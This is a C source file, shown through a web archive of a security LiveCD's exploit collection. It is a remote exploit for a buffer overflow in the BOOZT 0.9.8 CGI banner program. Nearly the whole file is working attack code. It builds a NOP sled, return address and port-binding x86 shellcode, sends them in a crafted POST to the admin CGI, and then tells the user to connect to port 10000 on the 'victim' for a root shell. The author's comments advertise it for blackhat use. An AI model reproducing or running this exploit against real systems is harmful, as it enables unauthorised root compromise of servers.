home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / boozt / ES-booz.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  7.7 KB  |  171 lines
  1. /* -----------------------------------------------------------------------
  2.  
  3.    BOOZT! Not so Standard 0.9.8 CGI vulnerability exploit
  4.    fixed/updated by BrainStorm - ElectronicSouls
  5.    now its much more usefull ;>
  6.  
  7.    Original Code by: Rafael San Miguel Carrasco - rsanmcar@alum.uax.es
  8.  
  9.    script kiddie enabled! .. this will give you a rootshell on port 10000
  10.    so this version isnt for admins its for blackhats! and kidz piss off!
  11.    this isnt widely used so nothing for kiddies anyway, since they cant own
  12.    100 systems with it =P ..
  13.  
  14.    greetz: ghQst,FreQ,it_fresh,SectorX,RobBbot,0x90,Resistor,Phantom,
  15.            divineint,rocsteele,websk8ter,nutsax,BuRn-X and all other
  16.            ElectronicSouls members - j00 r0ck =>
  17.  
  18.    -----------------------------------------------------------------------
  19. */
  20.  
  21.  
  22. #include <netinet/in.h>
  23.  
  24. #define PORT 8080
  25. #define BUFLEN 1597
  26. #define RET 0xbffff297
  27. #define NOP 0x90
  28.  
  29. int main (int argc, char **argv)
  30. {
  31.        int sockfd,
  32.                 i,
  33.              cont;
  34.  
  35.         struct sockaddr_in dest;
  36.  
  37.         int html_len = 15;
  38.  
  39.         char cgicontent[2048];
  40.         char buf[BUFLEN];
  41.         char shellcode[]=  "\x31\xc0"                   // xor     eax, eax
  42.                            "\x31\xdb"                   // xor     ebx, ebx
  43.                            "\x89\xe5"                   // mov     ebp, esp
  44.                            "\x99"                       // cdq
  45.                            "\xb0\x66"                   // mov     al, 102
  46.                            "\x89\x5d\xfc"               // mov     [ebp-4], ebx
  47.                            "\x43"                       // inc     ebx
  48.                            "\x89\x5d\xf8"               // mov     [ebp-8], ebx
  49.                            "\x43"                       // inc     ebx
  50.                            "\x89\x5d\xf4"               // mov     [ebp-12], ebx
  51.                            "\x4b"                       // dec     ebx
  52.                            "\x8d\x4d\xf4"               // lea     ecx, [ebp-12]
  53.                            "\xcd\x80"                   // int     80h
  54.                            "\x89\x45\xf4"               // mov     [ebp-12], eax
  55.                            "\x43"                       // inc     ebx
  56.                            "\x66\x89\x5d\xec"           // mov     [ebp-20], bx
  57.                            "\x66\xc7\x45\xee\x27\x10"   // mov     [ebp-18], word 4135
  58.                            "\x89\x55\xf0"               // mov     [ebp-16], edx
  59.                            "\x8d\x45\xec"               // lea     eax, [ebp-20]
  60.                            "\x89\x45\xf8"               // mov     [ebp-8], eax
  61.                            "\xc6\x45\xfc\x10"           // mov     [ebp-4], byte 16
  62.                            "\xb2\x66"                   // mov     dl, 102
  63.                            "\x89\xd0"                   // mov     eax, ed
  64.                            "\x8d\x4d\xf4"               // lea     ecx, [ebp-12]
  65.                            "\xcd\x80"                   // int     80h
  66.                            "\x89\xd0"                   // mov     eax, edx
  67.                            "\xb3\x04"                   // mov     bl, 4
  68.                            "\xcd\x80"                   // int     80h
  69.                            "\x43"                       // inc     ebx
  70.                            "\x89\xd0"                   // mov     eax, edx
  71.                            "\x99"                       // cdq
  72.                            "\x89\x55\xf8"               // mov     [ebp-8], edx
  73.                            "\x89\x55\xfc"               // mov     [ebp-4], edx
  74.                            "\xcd\x80"                   // int     80h
  75.                            "\x31\xc9"                   // xor     ecx, ecx
  76.                            "\x89\xc3"                   // mov     ebx, eax
  77.                            "\xb1\x03"                   // mov     cl, 3
  78.                            "\xb0\x3f"                   // mov     al, 63
  79.                            "\x49"                       // dec     ecx
  80.                            "\xcd\x80"                   // int     80h
  81.                            "\x41"                       // inc     ecx
  82.                            "\xe2\xf8"                   // loop    -7
  83.                            "\x52"                       // push    edx
  84.                            "\x68\x6e\x2f\x73\x68"       // push    dword 68732f6eh
  85.                            "\x68\x2f\x2f\x62\x69"       // push    dword 69622f2fh
  86.                            "\x89\xe3"                   // mov     ebx, esp
  87.                            "\x52"                       // push    edx
  88.                            "\x53"                       // push    ebx
  89.                            "\x89\xe1"                   // mov     ecx, esp
  90.                            "\xb0\x0b"                   // mov     al, 11
  91.                            "\xcd\x80";                  // int     80h
  92.  
  93.         char *html[15] =
  94.         {
  95.                 "POST /cgi-bin/boozt/admin/index.cgi HTTP/1.0\n",
  96.                 "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,*/*\n",
  97.                 "Referer: http://10.0.0.1:8080/cgi-bin/boozt/admin/index.cgi?section=5&input=1\n",
  98.                 "Accept-Language: en, de\n",
  99.                 "Content-Type: application/x-www-form-urlencoded\n",
  100.                 "UA-pixels: 640x480\n",
  101.                 "UA-color: color8\n",
  102.                 "UA-OS: Blackhat Leenux\n",
  103.                 "UA-CPU: x86\n",
  104.                 "User-Agent: Hackscape/1.0 (j00r asS gonna gets 0wned)\n",
  105.                 "Host: 10.0.0.1:8080\n",
  106.                 "Connection: Keep-Alive\n",
  107.                 "Content-Length: 1776\n",
  108.                 "Pragma: No-Cache\n",
  109.                 "\n",
  110.         };
  111.  
  112.         if (argc < 2)
  113.         {
  114.                 printf ("usage: %s <IP>\n", argv[0]);
  115.                 exit (-1);
  116.         }
  117.  
  118.         printf ("\n-----------------------------------\n");
  119.         printf ("   BOOZT! Not so Standard exploit    \n");
  120.         printf (" (C) BrainStorm - ElectronicSouls    \n");
  121.         printf ("-----------------------------------\n\n");
  122.         for (i = 0; i < BUFLEN; i+=4)*( (long *) &buf[i]) = RET;
  123.         for (i = 0; i < (BUFLEN - 16); i++) buf[i] = NOP;
  124.         cont = 0;
  125.         for (i = (BUFLEN - strlen (shellcode) - 16); i < (BUFLEN - 16); i++)
  126.                   buf[i] = shellcode [cont++];
  127.         strcpy (cgicontent, "name=");
  128.         strncat (cgicontent, buf, sizeof (buf));
  129.         strcat (cgicontent,"&target=&alt_text=&id_size=1&type=image&source=&source_path=Browse...&source_flash=&
  130. source_flash_path=Browse...&script_name=&input=1§ion=5&sent=1&submit=Create+New+Banner");
  131.  
  132.         printf ("* Connecting ...\n");
  133.         if ( (sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
  134.         {
  135.          perror ("socket");
  136.          exit (-1);
  137.         }
  138.         bzero (&dest, sizeof (dest));
  139.         dest.sin_family = AF_INET;
  140.         dest.sin_port = htons (PORT);
  141.         dest.sin_addr.s_addr = inet_addr (argv[1]);
  142.         if (connect (sockfd, &dest, sizeof (dest)) < 0)
  143.         {
  144.          perror ("connect");
  145.          exit (-1);
  146.         }
  147.         printf ("* Connected. sending data ...\n");
  148.         for (i = 0; i < html_len; i++)
  149.         {
  150.          if (write (sockfd, html[i], strlen(html[i])) < strlen(html[i]))
  151.         {
  152.          perror ("write");
  153.          exit (-1);
  154.         }
  155.         }
  156.         if (write (sockfd, cgicontent, strlen(cgicontent)) < strlen(cgicontent))
  157.         {
  158.          perror ("write cgicontent");
  159.          exit (-1);
  160.         }
  161.         if (close (sockfd) < 0)
  162.         {
  163.          perror ("close");
  164.          exit (-1);
  165.         }
  166.         printf("now connect to port 10000 on the victim host..          \n");
  167.         printf("if everything went well you should get a rootshell :> \n\n");
  168.         printf("enjoy..\n");
  169.         return 0;
  170. }
  171.